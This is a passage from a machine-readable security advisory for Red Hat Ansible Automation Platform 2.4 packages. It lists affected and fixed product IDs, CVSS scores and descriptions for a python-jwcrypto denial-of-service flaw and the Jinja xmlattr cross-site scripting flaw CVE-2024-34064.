"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
},
{
"cve": "CVE-2024-34064",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-05-07T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2279476"
}
],
"notes": [
{
"category": "description",
"text": "Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `\u003e`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe. This vulnerability is fixed in 3.1.4.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: accepts keys containing non-attribute characters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The fix for CVE-2024-22195 only addressed spaces, not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.\n\nFence agents on RHEL 8 has been fixed as a part of https://access.redhat.com/errata/RHBA-2024:4238",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
